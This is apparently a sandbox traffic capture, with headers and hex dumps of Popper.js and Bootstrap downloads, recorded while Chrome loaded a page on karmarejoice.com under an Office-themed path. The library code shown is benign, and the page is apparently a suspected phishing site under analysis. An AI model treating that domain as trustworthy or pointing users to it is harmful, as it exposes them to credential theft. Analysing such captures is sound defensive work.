                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PkPFd5BjF2yYja3xRPWL1l7kd35P9wF8NyKNbceJZ2CW9xX5buGk3zZuVjCY4voOrmlc7EnEAAKUCa80dmYW90j9DWvt%2FjVZOr29UTNhHbk%2F59g%2BZk9MfudDLTD%2BfumrcRSkl1IH"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                            NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                            Strict-Transport-Security: max-age=15780000
                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                            CF-RAY: 70ad8f3e8bac92b9-FRA
                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC804INData Raw: 34 61 66 34 0d 0a 2f 2a 0a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 46 65 64 65 72 69 63 6f 20 5a 69 76 6f 6c 6f 20 32 30 31 37 0a 20 44 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 28 6c 69 63 65 6e 73 65 20 74 65 72 6d 73 20 61 72 65 20 61 74 20 68 74 74 70 3a 2f 2f 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 4d 49 54 29 2e 0a 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 27 6f 62 6a 65 63 74 27 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 27 75 6e 64 65 66 69 6e 65 64 27 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 27 66 75 6e 63 74 69 6f 6e 27 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26
                                                                                                                                                                                                                            Data Ascii: 4af4/* Copyright (C) Federico Zivolo 2017 Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT). */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC804INData Raw: 72 3d 74 28 29 7d 29 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 27 75 73 65 20 73 74 72 69 63 74 27 3b 66 75 6e 63 74 69 6f 6e 20 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 27 5b 6f 62 6a 65 63 74 20 46 75 6e 63 74 69 6f 6e 5d 27 3d 3d 3d 7b 7d 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 2c 74 29 7b 69 66 28 31 21 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 29 72 65 74 75 72 6e 5b 5d 3b 76 61 72 20 6f 3d 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 65 2c 6e 75 6c 6c 29 3b 72 65 74 75 72 6e 20 74 3f 6f 5b 74 5d 3a 6f 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 72 65 74 75 72 6e 27 48 54 4d 4c 27 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 3f 65 3a 65 2e 70 61 72 65 6e 74 4e 6f 64 65 7c 7c 65 2e 68 6f 73 74
                                                                                                                                                                                                                            Data Ascii: r=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC805INData Raw: 54 4d 4c 27 3d 3d 3d 69 29 7b 76 61 72 20 6e 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 72 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 73 63 72 6f 6c 6c 69 6e 67 45 6c 65 6d 65 6e 74 7c 7c 6e 3b 72 65 74 75 72 6e 20 72 5b 6f 5d 7d 72 65 74 75 72 6e 20 65 5b 6f 5d 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 65 2c 74 29 7b 76 61 72 20 6f 3d 32 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 32 5d 2c 69 3d 61 28 74 2c 27 74 6f 70 27 29 2c 6e 3d 61 28 74 2c 27 6c 65 66 74 27 29 2c 72 3d 6f 3f 2d 31 3a 31 3b 72 65 74 75 72 6e 20 65 2e 74 6f 70 2b 3d 69 2a 72 2c 65 2e 62 6f 74 74 6f 6d 2b 3d 69 2a 72
                                                                                                                                                                                                                            Data Ascii: TML'===i){var n=e.ownerDocument.documentElement,r=e.ownerDocument.scrollingElement||n;return r[o]}return e[o]}function l(e,t){var o=2<arguments.length&&void 0!==arguments[2]&&arguments[2],i=a(t,'top'),n=a(t,'left'),r=o?-1:1;return e.top+=i*r,e.bottom+=i*r
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC807INData Raw: 3d 27 48 54 4d 4c 27 3d 3d 3d 6f 2e 6e 6f 64 65 4e 61 6d 65 2c 70 3d 67 28 65 29 2c 73 3d 67 28 6f 29 2c 64 3d 6e 28 65 29 2c 61 3d 74 28 6f 29 2c 66 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 62 6f 72 64 65 72 54 6f 70 57 69 64 74 68 2c 31 30 29 2c 6d 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 62 6f 72 64 65 72 4c 65 66 74 57 69 64 74 68 2c 31 30 29 2c 68 3d 63 28 7b 74 6f 70 3a 70 2e 74 6f 70 2d 73 2e 74 6f 70 2d 66 2c 6c 65 66 74 3a 70 2e 6c 65 66 74 2d 73 2e 6c 65 66 74 2d 6d 2c 77 69 64 74 68 3a 70 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 29 3b 69 66 28 68 2e 6d 61 72 67 69 6e 54 6f 70 3d 30 2c 68 2e 6d 61 72 67 69 6e 4c 65 66 74 3d 30 2c 21 69 26 26 72 29 7b 76 61 72 20 75 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 6d 61 72
                                                                                                                                                                                                                            Data Ascii: ='HTML'===o.nodeName,p=g(e),s=g(o),d=n(e),a=t(o),f=parseFloat(a.borderTopWidth,10),m=parseFloat(a.borderLeftWidth,10),h=c({top:p.top-s.top-f,left:p.left-s.left-m,width:p.width,height:p.height});if(h.marginTop=0,h.marginLeft=0,!i&&r){var u=parseFloat(a.mar
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC808INData Raw: 66 28 2d 31 3d 3d 3d 65 2e 69 6e 64 65 78 4f 66 28 27 61 75 74 6f 27 29 29 72 65 74 75 72 6e 20 65 3b 76 61 72 20 70 3d 79 28 6f 2c 69 2c 72 2c 6e 29 2c 73 3d 7b 74 6f 70 3a 7b 77 69 64 74 68 3a 70 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 74 2e 74 6f 70 2d 70 2e 74 6f 70 7d 2c 72 69 67 68 74 3a 7b 77 69 64 74 68 3a 70 2e 72 69 67 68 74 2d 74 2e 72 69 67 68 74 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 2c 62 6f 74 74 6f 6d 3a 7b 77 69 64 74 68 3a 70 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 70 2e 62 6f 74 74 6f 6d 2d 74 2e 62 6f 74 74 6f 6d 7d 2c 6c 65 66 74 3a 7b 77 69 64 74 68 3a 74 2e 6c 65 66 74 2d 70 2e 6c 65 66 74 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 7d 2c 64 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 73 29 2e 6d 61 70 28 66 75 6e
                                                                                                                                                                                                                            Data Ascii: f(-1===e.indexOf('auto'))return e;var p=y(o,i,r,n),s={top:{width:p.width,height:t.top-p.top},right:{width:p.right-t.right,height:p.height},bottom:{width:p.width,height:p.bottom-t.bottom},left:{width:t.left-p.left,height:p.height}},d=Object.keys(s).map(fun
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC809INData Raw: 65 2e 69 6e 64 65 78 4f 66 28 69 29 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 6f 2c 69 29 7b 76 61 72 20 6e 3d 76 6f 69 64 20 30 3d 3d 3d 69 3f 74 3a 74 2e 73 6c 69 63 65 28 30 2c 44 28 74 2c 27 6e 61 6d 65 27 2c 69 29 29 3b 72 65 74 75 72 6e 20 6e 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 5b 27 66 75 6e 63 74 69 6f 6e 27 5d 26 26 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 27 60 6d 6f 64 69 66 69 65 72 2e 66 75 6e 63 74 69 6f 6e 60 20 69 73 20 64 65 70 72 65 63 61 74 65 64 2c 20 75 73 65 20 60 6d 6f 64 69 66 69 65 72 2e 66 6e 60 21 27 29 3b 76 61 72 20 69 3d 74 5b 27 66 75 6e 63 74 69 6f 6e 27 5d 7c 7c 74 2e 66 6e 3b 74 2e 65 6e 61 62 6c 65 64 26 26 65 28 69 29 26 26 28 6f 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 3d 63 28 6f 2e 6f
                                                                                                                                                                                                                            Data Ascii: e.indexOf(i)}function C(t,o,i){var n=void 0===i?t:t.slice(0,D(t,'name',i));return n.forEach(function(t){t['function']&&console.warn('`modifier.function` is deprecated, use `modifier.fn`!');var i=t['function']||t.fn;t.enabled&&e(i)&&(o.offsets.popper=c(o.o
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC811INData Raw: 2c 74 68 69 73 2e 70 6f 70 70 65 72 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 27 2c 74 68 69 73 2e 70 6f 70 70 65 72 2e 73 74 79 6c 65 2e 74 6f 70 3d 27 27 2c 74 68 69 73 2e 70 6f 70 70 65 72 2e 73 74 79 6c 65 5b 57 28 27 74 72 61 6e 73 66 6f 72 6d 27 29 5d 3d 27 27 29 2c 74 68 69 73 2e 64 69 73 61 62 6c 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 28 29 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 6d 6f 76 65 4f 6e 44 65 73 74 72 6f 79 26 26 74 68 69 73 2e 70 6f 70 70 65 72 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 74 68 69 73 2e 70 6f 70 70 65 72 29 2c 74 68 69 73 7d 66 75 6e 63 74 69 6f 6e 20 42 28 65 29 7b 76 61 72 20 74 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3b 72 65 74 75 72 6e 20 74 3f 74 2e 64 65
                                                                                                                                                                                                                            Data Ascii: ,this.popper.style.position='',this.popper.style.top='',this.popper.style[W('transform')]=''),this.disableEventListeners(),this.options.removeOnDestroy&&this.popper.parentNode.removeChild(this.popper),this}function B(e){var t=e.ownerDocument;return t?t.de
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC812INData Raw: 6e 28 6f 29 7b 76 61 72 20 69 3d 74 5b 6f 5d 3b 21 31 3d 3d 3d 69 3f 65 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 6f 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 6f 2c 74 5b 6f 5d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 2c 74 2c 6f 29 7b 76 61 72 20 69 3d 54 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6f 3d 65 2e 6e 61 6d 65 3b 72 65 74 75 72 6e 20 6f 3d 3d 3d 74 7d 29 2c 6e 3d 21 21 69 26 26 65 2e 73 6f 6d 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 6e 61 6d 65 3d 3d 3d 6f 26 26 65 2e 65 6e 61 62 6c 65 64 26 26 65 2e 6f 72 64 65 72 3c 69 2e 6f 72 64 65 72 7d 29 3b 69 66 28 21 6e 29 7b 76 61 72 20 72 3d 27 60 27 2b 74 2b 27 60 27 3b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 27 60 27 2b 6f 2b 27 60
                                                                                                                                                                                                                            Data Ascii: n(o){var i=t[o];!1===i?e.removeAttribute(o):e.setAttribute(o,t[o])})}function F(e,t,o){var i=T(e,function(e){var o=e.name;return o===t}),n=!!i&&e.some(function(e){return e.name===o&&e.enabled&&e.order<i.order});if(!n){var r='`'+t+'`';console.warn('`'+o+'`
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC813INData Raw: 63 6f 6e 63 61 74 28 70 2e 73 6c 69 63 65 28 73 2b 31 29 29 5d 3b 72 65 74 75 72 6e 20 61 3d 61 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 2c 69 29 7b 76 61 72 20 6e 3d 28 31 3d 3d 3d 69 3f 21 72 3a 72 29 3f 27 68 65 69 67 68 74 27 3a 27 77 69 64 74 68 27 2c 70 3d 21 31 3b 72 65 74 75 72 6e 20 65 2e 72 65 64 75 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 27 27 3d 3d 3d 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 26 26 2d 31 21 3d 3d 5b 27 2b 27 2c 27 2d 27 5d 2e 69 6e 64 65 78 4f 66 28 74 29 3f 28 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 3d 74 2c 70 3d 21 30 2c 65 29 3a 70 3f 28 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 2b 3d 74 2c 70 3d 21 31 2c 65 29 3a 65 2e 63 6f 6e 63 61 74 28 74 29 7d 2c 5b 5d 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                            Data Ascii: concat(p.slice(s+1))];return a=a.map(function(e,i){var n=(1===i?!r:r)?'height':'width',p=!1;return e.reduce(function(e,t){return''===e[e.length-1]&&-1!==['+','-'].indexOf(t)?(e[e.length-1]=t,p=!0,e):p?(e[e.length-1]+=t,p=!1,e):e.concat(t)},[]).map(functio
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC815INData Raw: 65 3d 6f 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 6f 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 27 76 61 6c 75 65 27 69 6e 20 6f 26 26 28 6f 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 6f 2e 6b 65 79 2c 6f 29 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 2c 6f 2c 69 29 7b 72 65 74 75 72 6e 20 6f 26 26 65 28 74 2e 70 72 6f 74 6f 74 79 70 65 2c 6f 29 2c 69 26 26 65 28 74 2c 69 29 2c 74 7d 7d 28 29 2c 70 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 72 65 74 75 72 6e 20 74 20 69 6e 20 65 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 76 61 6c 75 65 3a 6f 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72
                                                                                                                                                                                                                            Data Ascii: e=o.enumerable||!1,o.configurable=!0,'value'in o&&(o.writable=!0),Object.defineProperty(e,o.key,o)}return function(t,o,i){return o&&e(t.prototype,o),i&&e(t,i),t}}(),pe=function(e,t,o){return t in e?Object.defineProperty(e,t,{value:o,enumerable:!0,configur
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC816INData Raw: 6f 64 69 66 69 65 72 73 5b 65 5d 29 7d 29 2e 73 6f 72 74 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 2e 6f 72 64 65 72 2d 74 2e 6f 72 64 65 72 7d 29 2c 74 68 69 73 2e 6d 6f 64 69 66 69 65 72 73 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 2e 65 6e 61 62 6c 65 64 26 26 65 28 74 2e 6f 6e 4c 6f 61 64 29 26 26 74 2e 6f 6e 4c 6f 61 64 28 6e 2e 72 65 66 65 72 65 6e 63 65 2c 6e 2e 70 6f 70 70 65 72 2c 6e 2e 6f 70 74 69 6f 6e 73 2c 74 2c 6e 2e 73 74 61 74 65 29 7d 29 2c 74 68 69 73 2e 75 70 64 61 74 65 28 29 3b 76 61 72 20 70 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 65 76 65 6e 74 73 45 6e 61 62 6c 65 64 3b 70 26 26 74 68 69 73 2e 65 6e 61 62 6c 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 28 29 2c 74 68 69 73 2e 73
                                                                                                                                                                                                                            Data Ascii: odifiers[e])}).sort(function(e,t){return e.order-t.order}),this.modifiers.forEach(function(t){t.enabled&&e(t.onLoad)&&t.onLoad(n.reference,n.popper,n.options,t,n.state)}),this.update();var p=this.options.eventsEnabled;p&&this.enableEventListeners(),this.s
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC817INData Raw: 69 6f 6e 28 65 29 7b 76 61 72 20 6f 3d 70 5b 65 5d 3b 72 65 74 75 72 6e 20 70 5b 65 5d 3c 69 5b 65 5d 26 26 21 74 2e 65 73 63 61 70 65 57 69 74 68 52 65 66 65 72 65 6e 63 65 26 26 28 6f 3d 4a 28 70 5b 65 5d 2c 69 5b 65 5d 29 29 2c 70 65 28 7b 7d 2c 65 2c 6f 29 7d 2c 73 65 63 6f 6e 64 61 72 79 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6f 3d 27 72 69 67 68 74 27 3d 3d 3d 65 3f 27 6c 65 66 74 27 3a 27 74 6f 70 27 2c 6e 3d 70 5b 6f 5d 3b 72 65 74 75 72 6e 20 70 5b 65 5d 3e 69 5b 65 5d 26 26 21 74 2e 65 73 63 61 70 65 57 69 74 68 52 65 66 65 72 65 6e 63 65 26 26 28 6e 3d 5f 28 70 5b 6f 5d 2c 69 5b 65 5d 2d 28 27 72 69 67 68 74 27 3d 3d 3d 65 3f 70 2e 77 69 64 74 68 3a 70 2e 68 65 69 67 68 74 29 29 29 2c 70 65 28 7b 7d 2c 6f 2c 6e 29 7d 7d 3b 72 65 74
                                                                                                                                                                                                                            Data Ascii: ion(e){var o=p[e];return p[e]<i[e]&&!t.escapeWithReference&&(o=J(p[e],i[e])),pe({},e,o)},secondary:function(e){var o='right'===e?'left':'top',n=p[o];return p[e]>i[e]&&!t.escapeWithReference&&(n=_(p[o],i[e]-('right'===e?p.width:p.height))),pe({},o,n)}};ret
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC819INData Raw: 67 5d 2d 75 29 29 2c 64 5b 6d 5d 2b 75 3e 73 5b 67 5d 26 26 28 65 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 5b 6d 5d 2b 3d 64 5b 6d 5d 2b 75 2d 73 5b 67 5d 29 2c 65 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 3d 63 28 65 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 29 3b 76 61 72 20 62 3d 64 5b 6d 5d 2b 64 5b 6c 5d 2f 32 2d 75 2f 32 2c 77 3d 74 28 65 2e 69 6e 73 74 61 6e 63 65 2e 70 6f 70 70 65 72 29 2c 79 3d 70 61 72 73 65 46 6c 6f 61 74 28 77 5b 27 6d 61 72 67 69 6e 27 2b 66 5d 2c 31 30 29 2c 45 3d 70 61 72 73 65 46 6c 6f 61 74 28 77 5b 27 62 6f 72 64 65 72 27 2b 66 2b 27 57 69 64 74 68 27 5d 2c 31 30 29 2c 76 3d 62 2d 65 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 5b 6d 5d 2d 79 2d 45 3b 72 65 74 75 72 6e 20 76 3d 4a 28 5f 28 73 5b 6c 5d 2d 75 2c
                                                                                                                                                                                                                            Data Ascii: g]-u)),d[m]+u>s[g]&&(e.offsets.popper[m]+=d[m]+u-s[g]),e.offsets.popper=c(e.offsets.popper);var b=d[m]+d[l]/2-u/2,w=t(e.instance.popper),y=parseFloat(w['margin'+f],10),E=parseFloat(w['border'+f+'Width'],10),v=b-e.offsets.popper[m]-y-E;return v=J(_(s[l]-u,
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC820INData Raw: 3b 28 6d 7c 7c 62 7c 7c 79 29 26 26 28 65 2e 66 6c 69 70 70 65 64 3d 21 30 2c 28 6d 7c 7c 62 29 26 26 28 69 3d 70 5b 64 2b 31 5d 29 2c 79 26 26 28 72 3d 4b 28 72 29 29 2c 65 2e 70 6c 61 63 65 6d 65 6e 74 3d 69 2b 28 72 3f 27 2d 27 2b 72 3a 27 27 29 2c 65 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 3d 73 65 28 7b 7d 2c 65 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 2c 53 28 65 2e 69 6e 73 74 61 6e 63 65 2e 70 6f 70 70 65 72 2c 65 2e 6f 66 66 73 65 74 73 2e 72 65 66 65 72 65 6e 63 65 2c 65 2e 70 6c 61 63 65 6d 65 6e 74 29 29 2c 65 3d 43 28 65 2e 69 6e 73 74 61 6e 63 65 2e 6d 6f 64 69 66 69 65 72 73 2c 65 2c 27 66 6c 69 70 27 29 29 7d 29 2c 65 7d 2c 62 65 68 61 76 69 6f 72 3a 27 66 6c 69 70 27 2c 70 61 64 64 69 6e 67 3a 35 2c 62 6f 75 6e 64 61 72 69 65 73
                                                                                                                                                                                                                            Data Ascii: ;(m||b||y)&&(e.flipped=!0,(m||b)&&(i=p[d+1]),y&&(r=K(r)),e.placement=i+(r?'-'+r:''),e.offsets.popper=se({},e.offsets.popper,S(e.instance.popper,e.offsets.reference,e.placement)),e=C(e.instance.modifiers,e,'flip'))}),e},behavior:'flip',padding:5,boundaries
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC821INData Raw: 72 28 65 2e 69 6e 73 74 61 6e 63 65 2e 70 6f 70 70 65 72 29 2c 66 3d 67 28 6c 29 2c 6d 3d 7b 70 6f 73 69 74 69 6f 6e 3a 6e 2e 70 6f 73 69 74 69 6f 6e 7d 2c 68 3d 7b 6c 65 66 74 3a 58 28 6e 2e 6c 65 66 74 29 2c 74 6f 70 3a 58 28 6e 2e 74 6f 70 29 2c 62 6f 74 74 6f 6d 3a 58 28 6e 2e 62 6f 74 74 6f 6d 29 2c 72 69 67 68 74 3a 58 28 6e 2e 72 69 67 68 74 29 7d 2c 63 3d 27 62 6f 74 74 6f 6d 27 3d 3d 3d 6f 3f 27 74 6f 70 27 3a 27 62 6f 74 74 6f 6d 27 2c 75 3d 27 72 69 67 68 74 27 3d 3d 3d 69 3f 27 6c 65 66 74 27 3a 27 72 69 67 68 74 27 2c 62 3d 57 28 27 74 72 61 6e 73 66 6f 72 6d 27 29 3b 69 66 28 64 3d 27 62 6f 74 74 6f 6d 27 3d 3d 63 3f 2d 66 2e 68 65 69 67 68 74 2b 68 2e 62 6f 74 74 6f 6d 3a 68 2e 74 6f 70 2c 73 3d 27 72 69 67 68 74 27 3d 3d 75 3f 2d 66 2e 77
                                                                                                                                                                                                                            Data Ascii: r(e.instance.popper),f=g(l),m={position:n.position},h={left:X(n.left),top:X(n.top),bottom:X(n.bottom),right:X(n.right)},c='bottom'===o?'top':'bottom',u='right'===i?'left':'right',b=W('transform');if(d='bottom'==c?-f.height+h.bottom:h.top,s='right'==u?-f.w
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC822INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                            24192.168.2.649898104.18.10.207443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC690OUTGET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1
                                                                                                                                                                                                                            Host: maxcdn.bootstrapcdn.com
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Origin: https://karmarejoice.com
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                            Referer: https://karmarejoice.com/lopi/office-RD117/
                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC822INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Fri, 13 May 2022 18:46:54 GMT
                                                                                                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            CDN-PullZone: 252412
                                                                                                                                                                                                                            CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                                                                                                                                                                                                                            CDN-RequestCountryCode: DE
                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                            Cache-Control: public, max-age=31919000
                                                                                                                                                                                                                            ETag: W/"14d449eb8876fa55e1ef3c2cc52b0c17"
                                                                                                                                                                                                                            Last-Modified: Mon, 25 Jan 2021 22:04:04 GMT
                                                                                                                                                                                                                            CDN-CachedAt: 03/12/2022 06:17:05
                                                                                                                                                                                                                            CDN-ProxyVer: 1.02
                                                                                                                                                                                                                            CDN-RequestPullCode: 200
                                                                                                                                                                                                                            CDN-RequestPullSuccess: True
                                                                                                                                                                                                                            CDN-EdgeStorageId: 864
                                                                                                                                                                                                                            CDN-Status: 200
                                                                                                                                                                                                                            timing-allow-origin: *
                                                                                                                                                                                                                            cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                            CDN-RequestId: 99bc0c4e746bd1ce2c060638cb05225e
                                                                                                                                                                                                                            CDN-Cache: HIT
                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                            Age: 2775
                                                                                                                                                                                                                            Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                            CF-RAY: 70ad8f3e89d890af-FRA
                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC823INData Raw: 37 62 62 34 0d 0a 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 30 2e 30 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74
                                                                                                                                                                                                                            Data Ascii: 7bb4/*! * Bootstrap v4.0.0 (https://getbootstrap.com) * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */!function(t
